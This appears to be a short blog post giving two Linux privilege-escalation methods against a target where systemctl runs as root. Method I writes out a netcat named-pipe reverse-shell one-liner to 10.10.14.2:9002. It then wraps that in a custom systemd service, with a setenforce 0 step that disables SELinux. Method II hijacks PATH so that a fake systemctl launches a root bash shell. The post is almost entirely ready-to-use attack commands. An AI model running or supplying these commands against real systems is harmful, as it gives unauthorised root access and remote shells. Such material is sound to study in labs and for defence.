This can be done when you find system ctl is running as root.
so we need to create my own service. that can be done by
METHOD - I
Create a file named test.sh in Target Machine
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9002 >/tmp/f
save it as test.sh → copy the file to
/home/bhanu/test.sh
chmod +x test.sh
now create a new service: → save it as mys.service
[Unit]
Description=Example systemd service.
[Service]
Type=simple
ExecStart=/bin/bash /home/bhanu/test.sh
[Install]
WantedBy=multi-user.target
# Another set of Service - USE ONLY ONE SERVICE
[Unit]
Description=Example systemd service.
[Service]
Type=simple
ExecStart=/bin/bash -p -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target
#if you face any issues run below 2 commands
sudo setenforce 0
sudo systemctl daemon-reload
#not mandatory
chmod 644 /home/bhanu/mys.service
# Start the Service
systemctl enable /home/bhanu/mys.service
#Check status incase of any errors
systemctl status /home/bhanu/mys.service
open a new terminal in kali:
nc -nvlp 9002
In Victim machine
systemctl start mys.service
METHOD - II
This can be achieved by adding a new path when systemctl is running as root.
echo $PATH
systemctl //runs the original systemctl
cd /tmp
nano systemctl
bash //Add bash in systemctl file
PATH=/tmp:$PATH
export PATH
systemctl //runs bash. explained above in method I
You need to run the systemctl as root to get the root shell.
Comments
Post a Comment